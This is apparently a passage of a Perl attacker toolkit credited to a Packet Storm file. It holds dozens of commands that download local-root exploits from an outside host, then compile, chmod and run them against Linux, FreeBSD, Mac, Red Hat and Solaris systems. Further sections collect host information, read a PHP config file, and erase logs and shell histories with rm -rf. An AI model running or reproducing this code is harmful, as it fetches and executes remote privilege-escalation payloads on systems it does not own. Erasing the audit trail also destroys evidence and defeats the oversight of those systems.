system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/05;chmod 777 05;./05");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad2;chmod 777 krad2;./krad2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/ong_bak.c;gcc ong_bak.c -o ong_bak;chmod 777 ong_bak;./ong_bak");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.9-55-2007-prv8;chmod 777 2.6.9-55-2007-prv8;./2.6.9-55-2007-prv8");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/04;chmod 777 04;./04");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/06;chmod 777 06;./06");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/r00t;chmod 777 r00t;./r00t");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/uselib24.c;gcc uselib24.c -o uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.11.c;gcc 2.6.11.c -o 2.6.11;chmod 777 2.6.11;./2.6.11");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad.c;gcc k-rad.c -o k-rad;chmod 777 k-rad;./k-rad");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad3;chmod 777 k-rad3;./k-rad3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/pwned;chmod 777 pwned;./pwned");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/binfmt_elf.c;gcc binfmt_elf.c -o binfmt_elf;chmod 777 binfmt_elf;./binfmt_elf");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/elfcd2.c;gcc elfcd2.c -o elfcd2;chmod 777 elfcd2;./elfcd2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct1;chmod 777 prct1;./prct1");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct2;chmod 777 prct2;./prct2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct3;chmod 777 prct3;./prct3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct4;chmod 777 prct4;./prct4");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct6;chmod 777 prct6;./prct6");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/raptor;chmod 777 raptor;./raptor");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.17;chmod 777 2.6.17;./2.6.17");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct5.sh;chmod 777 prct5.sh;./prct5.sh");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root;chmod 777 root;./root");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/cw7.3;chmod 777 cw7.3;./cw7.3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x;chmod 777 x;./x");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x2;chmod 777 x2;./x2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/exp.sh;chmod 777 exp.sh;./exp.sh");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root2;chmod 777 root2;./root2");
system ("id");
freebsd:;
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/bsd;chmod 777 bsd;./bsd");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/48local;chmod 777 48local;./48local");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/exploit;chmod 777 exploit;./exploit");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/freedbs5.3;chmod 777 freedbs5.3;./freedbs5.3");
system ("id");
mac:;
system ("cd /tmp;mkdir mac;chmod 777 mac;cd mac;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/mac/macosX;chmod 777 macosX;./macosX");
system ("id");
red:;
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/afd-expl.c;gcc afd-expl.c -o afd-expl;chmod 777 afd-expl;./afd-expl");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/alsaplayer-suid.c;gcc alsaplayer-suid.c -o alsaplayer-suid;chmod 777 alsaplayer-suid;./alsaplayer-suid");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/nslconf.c;gcc nslconf.c -o nslconf;chmod 777 nslconf;./nslconf");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ohMy-another-efs;chmod 777 ohMy-another-efs;./ohMy-another-efs");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/0x82-Remote.tannehehe.xpl.c;gcc 0x82-Remote.tannehehe.xpl.c -o 0x82-Remote.tannehehe.xpl;chmod 777 0x82-Remote.tannehehe.xpl;./0x82-Remote.tannehehe.xpl");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/efs_local;chmod 777 efs_local;./efs_local");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ifenslave;chmod 777 ifenslave;./ifenslave");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/crontab.c;gcc crontab.c -o crontab;chmod 777 crontab;./crontab");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/epcs2.c;gcc epcs2.c -o epcs2;chmod 777 epcs2;./epcs2");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/rh71sm8.c;gcc rh71sm8.c -o rh71sm8;chmod 777 rh71sm8;./rh71sm8");
system ("id");
sun:;
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/solaris27;chmod 777 solaris27;./solaris27");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/final;chmod 777 final;./final");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos59;chmod 777 sunos59;./sunos59");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos510.c;gcc sunos510.c -o sunos510;chmod 777 sunos510;./sunos510");
system ("id");
sysinfo:;
system ("dmesg");
print "\n\n";
system ("set");
print "\n\n";
system ("uname -a");
print "\n\n";
system ("uname -r");
print "\n\n";
system ("ifconfig");
print "\n\n";
goto command;
gccinfo:;
system ("locate gcc");
print "\n\n";
goto command;
sysproc:;
system ("ps aux");
print "\n\n";
goto command;
logc:;
system ("rm -rf /tmp/logs");
system ("rm -rf $HISTFILE");
system ("rm -rf /root/.ksh_history");
system ("rm -rf /root/.bash_history");
system ("rm -rf /root/.bash_logout");
system ("rm -rf /usr/local/apache/logs");
sleep(2);
system ("rm -rf /usr/local/apache/log");
system ("rm -rf /var/apache/logs");
system ("rm -rf /var/apache/log");
system ("rm -rf /var/run/utmp");
system ("rm -rf /var/logs");
system ("rm -rf /var/log");
sleep(2);
system ("rm -rf /var/adm");
system ("rm -rf /etc/wtmp");
system ("rm -rf /etc/utmp");
print "\n";
print "Done!";
goto command;
logs:;
print "\n";
system ("cat /etc/syslog.conf");
print "\n\n";
goto command;
config:;
print "\n";
system ("cat ./../mainfile.php");
print "\n\n";
goto command;
Sumber : http://packetstormsecurity.org/files/view/102380/var.txt
File list : http://bl4ck-viper.persiangig.com/p8/localroots/
